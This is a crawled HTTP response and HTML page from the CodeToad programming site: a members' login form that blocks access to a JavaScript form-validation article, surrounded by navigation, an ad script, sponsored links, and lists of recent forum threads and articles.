Set-Cookie: ASPSESSIONIDQCTDBARC=GMMLJKMBGKHLOOEOMKGPIPGP; path=/
Cache-control: private



<html>
<head>
<title></title>
<meta name="description" content>
<meta name="keywords" content>
<meta name="generator" content="CuteHTML">
</head>


<LINK href="/images/style4.css" type=text/css rel=stylesheet>






</HEAD>


<BODY bgColor=#ffffff leftMargin=0 topMargin=0 marginwidth="0"
marginheight="0"><A name=top></A>

<TABLE cellSpacing=0 cellPadding=0 width="100%" border=0>
<TBODY>
<TR>
<TD>
<TABLE cellSpacing=0 cellPadding=0 width="100%" border=0>
<TBODY>
<TR>
<TD bgcolor=#0099ff colSpan=3 height=1><img src=/images/frog_slit.gif height=2 width=72></TD></TR>
<TR>
<TD bgcolor=#0066cc vAlign=top noWrap><A
href="/"><IMG height=36
alt=codetoad.com src="/images/codetoad3.gif" width=309
border=0></A></TD>

<td nowrap width=240 height=36
bgcolor=#0066cc><div class=loginbox
style="WIDTH: 240px;height:36;padding:3px;valign:middle">&nbsp;&nbsp;<a href=http://www.codetoad.com/demos/shopping_cart/>ASP Shopping
Cart</a>,&nbsp;<a href=http://www.codetoad.com/demos/forum/>Forum</a>&nbsp;&amp;&nbsp;<a href=http://www.codetoad.com/demos/blog/>BBS</a><BR>
&nbsp;&nbsp;- all for $20 from <a href=http://www.codetoad.com/plus/>CodeToad Plus!</a></div></td>



<TD height=36 bgcolor=#0066cc nowrap align=right valign=middle>



<div style="WIDTH: 130px">
<a href="/members/login.asp?url=http://www.codetoad.com/members/login.asp"><img src=/images/login_sq.png border=0></a>&nbsp;<a
href="/members/join.asp"><img src=/images/join_sq.png border=0></a>&nbsp;
</div>


</TD> <td bgcolor=#0066cc width=3><img src=/images/sp.gif width=3 height=1></td>

</TR>
<tr >

<TD colSpan=3 height=10 width=100%><img src=/images/frog_slit4.gif height=10 width=100%></TD></TR>
<TR>
</TBODY></TABLE>
<TABLE cellSpacing=0 cellPadding=0 width="100%" border=0 height=25>


<TR height=25><TD bgcolor=#FFFBDE >&nbsp;&nbsp;<A class=menu_text style="FONT-SIZE: smaller" href="/" title="CodeToad Home Page" target=_top>Home</A>&nbsp;||&nbsp;<A class=menu_text style="FONT-SIZE: smaller" title="asp scripts and tutorials" href="/asp" target=_top>ASP</A>&nbsp;|&nbsp;<A class=menu_text style="FONT-SIZE: smaller" title="asp.net scripts and tutorials" href="/asp.net/" target=_top>ASP.Net</A>&nbsp;|&nbsp;<A class=menu_text style="FONT-SIZE: smaller" title="C++ scripts and tutorials" href="/c" target=_top>C++/C#</A>&nbsp;|&nbsp;<A class=menu_text style="FONT-SIZE: smaller" title="dhtml scripts and tutorials" href="/dhtml" target=_top>DHTML</A>&nbsp;|&nbsp;<A class=menu_text style="FONT-SIZE: smaller" title="html scripts and tutorials" href="/html" target=_top>HTML</A>&nbsp;|&nbsp;<A class=menu_text style="FONT-SIZE: smaller" title="java scripts and tutorials" href="/java" target=_top>Java</A>&nbsp;|&nbsp;<A class=menu_text style="FONT-SIZE: smaller" title="javascript scripts and tutorials" href="/javascript" target=_top>Javascript</A>&nbsp;|&nbsp;<A class=menu_text style="FONT-SIZE: smaller" title="perl scripts and tutorials" href="/perl" target=_top>Perl</A>&nbsp;|&nbsp;<A class=menu_text style="FONT-SIZE: smaller" title="visual basic scripts and tutorials" href="/visual_basic" target=_top>VB</A>&nbsp;|&nbsp;<A class=menu_text style="FONT-SIZE: smaller" title="xml scripts and tutorials" href="/xml" target=_top>XML</A>&nbsp;||&nbsp;<A class=menu_text style="FONT-SIZE: smaller" title="shopping cart source code and more.." href="/plus" target=_top>CodeToad&nbsp;Plus!</A>&nbsp;||&nbsp;<A class=menu_text style="FONT-SIZE: smaller" title="codetoad forums" href="/forum" target=_top>Forums</A>&nbsp;||&nbsp;<A class=menu_text style="FONT-SIZE: smaller" title="ram memory upgrades" href="/store/ram-memory/" target=_top>RAM</A>&nbsp;</TD>
</TR></table>



<TABLE cellSpacing=0 cellPadding=0 width="100%" border=0 height=25>
<TR height=25>
<form action=/search.asp method=get id=search_form name=search_form>
<TD bgcolor=#FFFBDE align=center><table><td>
<font face="arial,helvetica" size=2><b>Search Site: </b></td>
<td bgcolor=f5f5f5 height=10 align="right" VALIGN=middle><input type=text name=keyword size=15 class="displayINPUT" ></td>
<td bgcolor=f5f5f5 height=10 align="right" VALIGN=middle><input type=submit value="GO" style="background-color:efefef;font-size:10px;font-weight:bold" border=0 width=21 height=21 hspace=1 vspace=1 id=image1 name=image1>
</td></form>
</TR>
</TABLE></td></tr></table>


<TABLE cellSpacing=0 cellPadding=0 width="100%" border=0>
<TBODY>
<TR>
<TD bgcolor=#003399><IMG height=1 alt=""
src="/images/sp.gif" width=6></TD>
<TD bgcolor=black width=1920><IMG height=1 alt=""
src="/images/sp.gif"
width=745></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE>


<TABLE cellSpacing=0 cellPadding=0 width=100% height=100% border=0>
<TBODY>
<TR><td valign=top>







<TD class=back1 vAlign=top height=100% valign=top>


<table border=0 width=100%>
<Tr><td valign=top colspan=2>
</td></tr>


<tr><td valign=top width=100%>


<!-- already start of next td of main table //-->
<table cellpadding="0" cellspacing="0" border="0" width="100%" align="center">
<tr><td height="1" width="100%" >
<h3>Members' Login.</h3></td></tr></table>

<font face="arial" size="2" color=red>***
<b> The page you are trying to access requires you to be logged in .***<BR><BR>
</font>


<table BORDER="0" width="600" align="center">
<form METHOD="POST" ACTION="login2.asp" name="form_tab">


<tr><td colspan="3">
<table bgcolor="black" width="90%" cellspacing="0" cellpadding="1"><tr><td>
<table bgcolor="f5f5f5" width="100%">
<tr><td colspan="3"><b>Members' Login.</b>
<br><img src="../images/sp.gif" height="2"></td></tr>
<tr><td>
<table width="100%">
<tr><td>Email:</td><td><input TYPE="text" SIZE="20" NAME="email" value></td></tr>
<tr>
<td>Password:</td><td><input TYPE="password" SIZE="20" NAME="password"></td></tr>

<input type=hidden name=url value="http://www.codetoad.com/javascript/form_validation_function.asp">

<tr>
<td></td><td><input type="submit" value=" - L o g i n - " style="background-color:efefef" ></td>
</tr></form></table>
</td></tr></table></td></tr></table>
</td></tr>
</table>

<p><font color="black">
<a href="forgotten.asp"><b>Forgotten your password?</b></a> <br><br>
For more
information on becoming a member, <a href="join.asp"><b>click here</b></a>.
<b> </b><br><br>
</div>



<!-- content ends here -->


</td> <td width=170 valign=top>












<table align=center width=100% cellpadding=0 cellspacing=1><tr><td>
<table width=100% cellpadding=0 cellspacing=0 ><tr><td align=center>
















<TR>
<TD align=middle><FONT face="MS Sans serif, arial, verdana,helvetica"
color=#ffffff size=-3><B> </B></FONT> </TD>
</TR>

<tr><td width=160 valign=top align=center><BR>




<script type="text/javascript"><!--
google_ad_client = "pub-1899416976695671";
google_ad_width = 120;
google_ad_height = 600;
google_ad_format = "120x600_as";
google_color_border = "FFFFCC";
google_color_bg = "FFFFFF";
google_color_link = "0000FF";
google_color_url = "008000";
google_color_text = "000000";
google_ad_channel ="9541164047";

google_ad_type = "text_image";
//--></script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>

<BR><BR>






<BR>
<div class=boxes>
<table width=160 bgcolor=ffffff>
<tr><td align=center valign=top>
<b>Useful Links</b>
<BR><img src=/images/sp.gif height=6><BR>
<font class="box_text" size=2>


<a href="http://www.faxcritics.com/">Online Fax Reviews</a>
<BR><img src=/images/sp.gif height=6><BR>



<a href="http://www.topwebhostreview.net/fatcow-review/" title="FatCow Web Hosting Reviews">FatCow Review</a>

<BR><img src=/images/sp.gif height=6><BR>

<a href="http://www.specialtyansweringservice.net">Answering Service</a>

<BR><img src=/images/sp.gif height=6><BR>













</td></tr><tr><td align=right valign=top>
<font size=1><a href=/help/advertise_bar.asp>Advertise here</a></font></td></tr></table>
</div>
<BR>


<BR>
<div class=boxes>
<table width=160 bgcolor=ffffff><tr><td align=center valign=top><b>CodeToad Experts</b>
<BR><img src=/images/sp.gif height=6><BR>
<font class="box_text" size=2>Can't find the answer?<BR>
Our <b><a href=http://www.codetoad.com/experts.asp>Site experts</a></b>
are answering questions for free in the <b><a href=http://www.codetoad.com/forum/>CodeToad forums</a></b>
</font></td></tr></table>
</div>

</td>
</tr></table></td></tr>
</table>



</td></tr>

</table>



<table align=center width=100% cellpadding=0 cellspacing=0 border=0>
<tr>


<td width=100% align=center>

<BR><BR><BR><BR><BR><BR><BR><BR>

<table>
<TR>
<TD align=middle><FONT face="MS Sans serif, arial, verdana,helvetica"
color=#000000 size=-3><B>Recent Forum Threads</B></FONT> </TD>
</TR>
<tr><td align=center>
<table width=100% cellpadding=0 cellspacing=0 bgcolor=white>
<tr bgcolor=#ffffff><td valign=top>&#149;&nbsp;</td><td><a style="font-size:10px" href=http://www.codetoad.com/forum/14_24392.asp>Re: drop-down menu selected value</a></td></tr>
<tr bgcolor=#eeeeee><td valign=top>&#149;&nbsp;</td><td><a style="font-size:10px" href=http://www.codetoad.com/forum/14_20958.asp>Re: Loading Sequence of Frames</a></td></tr>
<tr bgcolor=#ffffff><td valign=top>&#149;&nbsp;</td><td><a style="font-size:10px" href=http://www.codetoad.com/forum/16_22580.asp>Re: Auto Reply</a></td></tr>
<tr bgcolor=#eeeeee><td valign=top>&#149;&nbsp;</td><td><a style="font-size:10px" href=http://www.codetoad.com/forum/25_28060.asp>Re: dereferenceing a string to a constant name</a></td></tr>
<tr bgcolor=#ffffff><td valign=top>&#149;&nbsp;</td><td><a style="font-size:10px" href=http://www.codetoad.com/forum/16_25107.asp>Re: how can i make link</a></td></tr>
<tr bgcolor=#eeeeee><td valign=top>&#149;&nbsp;</td><td><a style="font-size:10px" href=http://www.codetoad.com/forum/23_26353.asp>Re: onclick thumbnail images in gridview or datalist</a></td></tr>
<tr bgcolor=#ffffff><td valign=top>&#149;&nbsp;</td><td><a style="font-size:10px" href=http://www.codetoad.com/forum/18_24629.asp>Re: The Dim appExcel As Excel.Application doesn`t work ????</a></td></tr>
<tr bgcolor=#eeeeee><td valign=top>&#149;&nbsp;</td><td><a style="font-size:10px" href=http://www.codetoad.com/forum/24_27273.asp>Re: c# .net Exception of type System.StackOverflowException was thrown.</a></td></tr>
<tr bgcolor=#ffffff><td valign=top>&#149;&nbsp;</td><td><a style="font-size:10px" href=http://www.codetoad.com/forum/15_27598.asp>Re: Plz its urgent:validation code</a></td></tr>
</table>
<BR><BR>
</td></tr>


<TR>
<TD align=middle><FONT face="MS Sans serif, arial, verdana,helvetica"
color=#000000 size=-3><B>Recent Articles</B></FONT> </TD>
</TR>
<tr><td align=center>
<table width=100% cellpadding=0 cellspacing=0 bgcolor=white>
<tr bgcolor=#ffffff><td valign=top><img src=http://www.codetoad.com/images/article.gif></td><td><a style="font-size:10px" href=http://www.codetoad.com/asp_filesys_gettempname.asp>ASP GetTempName </a></td></tr>
<tr bgcolor=#eeeeee><td valign=top><img src=http://www.codetoad.com/images/article.gif></td><td><a style="font-size:10px" href=http://www.codetoad.com/asp_utf8.asp>Decode and Encode UTF-8</a></td></tr>
<tr bgcolor=#ffffff><td valign=top><img src=http://www.codetoad.com/images/article.gif></td><td><a style="font-size:10px" href=http://www.codetoad.com/asp_filesys_getfile.asp>ASP GetFile</a></td></tr>
<tr bgcolor=#eeeeee><td valign=top><img src=http://www.codetoad.com/images/article.gif></td><td><a style="font-size:10px" href=http://www.codetoad.com/asp_filesys_folderexists.asp>ASP FolderExists </a></td></tr>
<tr bgcolor=#ffffff><td valign=top><img src=http://www.codetoad.com/images/article.gif></td><td><a style="font-size:10px" href=http://www.codetoad.com/asp_filesys_fileexists.asp>ASP FileExists</a></td></tr>
<tr bgcolor=#eeeeee><td valign=top><img src=http://www.codetoad.com/images/article.gif></td><td><a style="font-size:10px" href=http://www.codetoad.com/asp_filesys_opentextfile.asp>ASP OpenTextFile </a></td></tr>
<tr bgcolor=#ffffff><td valign=top><img src=http://www.codetoad.com/images/article.gif></td><td><a style="font-size:10px" href=http://www.codetoad.com/asp_filesystemobject.asp>ASP FilesystemObject</a></td></tr>
<tr bgcolor=#eeee..